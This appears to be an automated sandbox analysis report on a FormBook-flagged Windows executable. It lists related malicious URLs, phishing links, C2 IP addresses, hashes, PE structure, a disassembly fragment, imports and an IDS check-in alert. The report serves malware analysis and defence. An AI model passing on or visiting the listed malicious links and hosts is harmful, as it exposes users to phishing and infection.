| https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t | Get hash | malicious | HTMLPhisher | Browse
  • 104.18.24.163
| file.exe | Get hash | malicious | LummaC Stealer | Browse
  • 172.67.165.166
| http://beacons.ai/luluhime_xo | Get hash | malicious | Unknown | Browse
  • 104.16.79.73
| http://beacons.ai/390 | Get hash | malicious | Unknown | Browse
  • 172.67.20.182
| http://beacons.ai/390 | Get hash | malicious | Unknown | Browse
  • 104.16.79.73
AMAZON-02US | https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t | Get hash | malicious | HTMLPhisher | Browse
  • 13.227.8.64
| .i.elf | Get hash | malicious | Unknown | Browse
  • 54.171.230.55
| http://frame.wtf | Get hash | malicious | Unknown | Browse
  • 44.238.68.12
| https://emailtransaction.com/?u=84775-2a97acb5884211437e2511ddc7c4e345386c33487a558c479c7af49e7f66170e | Get hash | malicious | Unknown | Browse
  • 52.217.44.238
| agent.elf | Get hash | malicious | Unknown | Browse
  • 54.171.230.55
| https://nahud.com/mailwizz-2.2.7/latest/index.php/campaigns/jm929ck1nc903/track-url/wh75022djq6fe/88db1e075fc0ca4d21e7c4fe4c14b76f34a46190 | Get hash | malicious | Unknown | Browse
  • 54.185.22.79
| ub8ehJSePAfc9FYqZIT6.arm5.elf | Get hash | malicious | Unknown | Browse
  • 54.171.230.55
| https://pro.arawato.pro/ | Get hash | malicious | HTMLPhisher | Browse
  • 76.76.21.21
| Demon.sh4.elf | Get hash | malicious | Mirai, Gafgyt | Browse
  • 34.249.145.219
| [EXTERNAL] Fw_ LVW 1201831..eml | Get hash | malicious | Unknown | Browse
  • 18.189.146.174
YURTEH-ASUA | BASF Hung#U00e1ria Kft.exe | Get hash | malicious | FormBook | Browse
  • 45.141.156.114
| CV_ Filipa Barbosa.exe | Get hash | malicious | FormBook | Browse
  • 45.141.156.114
| CV_ Filipa Barbosa.exe | Get hash | malicious | FormBook | Browse
  • 45.141.156.114
| Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Get hash | malicious | FormBook | Browse
  • 45.141.156.114
| CV_ Filipa Barbosa.exe | Get hash | malicious | FormBook | Browse
  • 45.141.156.114
| support.Client.exe | Get hash | malicious | ScreenConnect Tool | Browse
  • 31.42.187.210
| support.Client.exe | Get hash | malicious | ScreenConnect Tool | Browse
  • 31.42.187.210
| SI HE Voy - TC Relet 11.docx.scr.exe | Get hash | malicious | AgentTesla | Browse
  • 152.89.61.240
| MV ALEXOS_VESSEL'S DESC.docx.scr.exe | Get hash | malicious | AgentTesla | Browse
  • 152.89.61.240
| https://r2.ddlnk.net/c/AQj0-RUQuwkYipioASC0cRmrHeGLBOb7t9m7_CWaa81LkCY1aSe2ilmnvwK5PXzQ | Get hash | malicious | Unknown | Browse
  • 152.89.61.240
No context
No context
Process: C:\Windows\SysWOW64\mobsync.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe
File Type: data
Category: dropped
Size (bytes): 287232
Entropy (8bit): 7.994023075119688
Encrypted: true
SSDEEP: 6144:+Hn3ZKlkNEDybhfI9HGKsi+FbGEnEFg2WrV4790a:+H3ZK+C2dWQbF0z90a
MD5: 9DE9110CD553FF6CB3602FF7C9416709
SHA1: 3B59F6F29305FEC14EE70183A45FE1BED0A3F576
SHA-256: D060991C68F390E483E6D5961C57B8F56A46C87455E71FC5E43F18DB69D5C1D5
SHA-512: 673E22133F733BCF27D37C460B5768AA235CE1D8959A451010CA5058FE294A9EBBDAF9C5703EC22A4EEBCD1540F71CFD6BD187ABDDB7DF9269D2EE3314B16B55
Malicious: false
Reputation: low
                                                      Preview:.m.N75UX\BVA.47.T7FN45U.XBVA9M473T7FN45UXXBVA9M473T7FN45UXX.VA9C+.=T.O...T..c.)P>.GA;P4/Y.696,95./Q.A!Yf'Z....b;.](.:>^.FN45UXX;WH.pTP.iW!..U2.B....-S.).rTR.B..}Y*.eZ7_{.S.UXXBVA9Mdr3T{GO4.}.8BVA9M473.7DO?4^XX.RA9M473T7F. 5UXHBVAYI473.7F^45UZXBPA9M473T1FN45UXXB6E9M673T7FN65..XBFA9]473T'FN$5UXXBVQ9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45Uv,'.59M4C}P7F^45U.\BVQ9M473T7FN45UXXbVAYM473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M
Process: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe
File Type: data
Category: dropped
Size (bytes): 287232
Entropy (8bit): 7.994023075119688
Encrypted: true
SSDEEP: 6144:+Hn3ZKlkNEDybhfI9HGKsi+FbGEnEFg2WrV4790a:+H3ZK+C2dWQbF0z90a
MD5: 9DE9110CD553FF6CB3602FF7C9416709
SHA1: 3B59F6F29305FEC14EE70183A45FE1BED0A3F576
SHA-256: D060991C68F390E483E6D5961C57B8F56A46C87455E71FC5E43F18DB69D5C1D5
SHA-512: 673E22133F733BCF27D37C460B5768AA235CE1D8959A451010CA5058FE294A9EBBDAF9C5703EC22A4EEBCD1540F71CFD6BD187ABDDB7DF9269D2EE3314B16B55
Malicious: false
                                                      Preview:.m.N75UX\BVA.47.T7FN45U.XBVA9M473T7FN45UXXBVA9M473T7FN45UXX.VA9C+.=T.O...T..c.)P>.GA;P4/Y.696,95./Q.A!Yf'Z....b;.](.:>^.FN45UXX;WH.pTP.iW!..U2.B....-S.).rTR.B..}Y*.eZ7_{.S.UXXBVA9Mdr3T{GO4.}.8BVA9M473.7DO?4^XX.RA9M473T7F. 5UXHBVAYI473.7F^45UZXBPA9M473T1FN45UXXB6E9M673T7FN65..XBFA9]473T'FN$5UXXBVQ9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45Uv,'.59M4C}P7F^45U.\BVQ9M473T7FN45UXXbVAYM473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M473T7FN45UXXBVA9M
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.1960956776532194
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: YH-3-12-2024-GDL Units - Projects.exe
File size: 1'213'952 bytes
MD5: 36e50660f18927eb838ce85dd46778c4
SHA1: 2a81b0b315cf21f286d262a12ac0666145df7bac
SHA256: ec5bf8186eac9177d93bdf735449b9b4023631dcb3e67e1e5809dc22dbba842b
SHA512: a5d3ccb7b936ba334033add5922e5ec5bbcf721609fb5641e19092da9b0cd0c1aa09ea1b8bbea3f7b324115e015e3ec60a90749d0b5769aad4c00de235bdcad2
SSDEEP: 24576:uu6J33O0c+JY5UZ+XC0kGso6FaKpRP2uktTMqXrsjRWY:gu0c++OCvkGs9FaKpROukXAIY
TLSH: B945CF2273DDC360CB669173BF6AB7016EBF3C614A30B85B2F980D7DA950161162DB63
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x427dcd
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x674E4731 [Mon Dec 2 23:48:01 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
Instruction
                                                      call 00007FCFC4E3778Ah
                                                      jmp 00007FCFC4E2A554h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push edi
                                                      push esi
                                                      mov esi, dword ptr [esp+10h]
                                                      mov ecx, dword ptr [esp+14h]
                                                      mov edi, dword ptr [esp+0Ch]
                                                      mov eax, ecx
                                                      mov edx, ecx
                                                      add eax, esi
cmp edi, esi
jbe 00007FCFC4E2A6DAh
cmp edi, eax
jc 00007FCFC4E2AA3Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FCFC4E2A6D9h
rep movsb
jmp 00007FCFC4E2A9ECh
cmp ecx, 00000080h
jc 00007FCFC4E2A8A4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FCFC4E2A6E0h
bt dword ptr [004BE324h], 01h
jc 00007FCFC4E2ABB0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FCFC4E2A87Dh
test edi, 00000003h
jne 00007FCFC4E2A88Eh
test esi, 00000003h
jne 00007FCFC4E2A86Dh
bt edi, 02h
jnc 00007FCFC4E2A6DFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FCFC4E2A6E3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FCFC4E2A735h
bt esi, 03h
jnc 00007FCFC4E2A788h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5fc24 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x127000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5fc24 | 0x5fe00 | 0c052a8ef5f581d1d64a6961feb0e3a8 | False | 0.9307264504563233 | data | 7.901992411652025 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x127000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x56eeb | data | | | 1.0003257740644527
RT_GROUP_ICON | 0x1266a4 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x12671c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x126730 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x126744 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x126758 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x126834 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-03T06:54:26.889952+0100 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.4 | 49737 | 134.0.14.158 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Dec 3, 2024 06:54:50.368663073 CET8049776103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:50.368751049 CET8049776103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:50.368762016 CET8049776103.224.182.242192.168.2.4
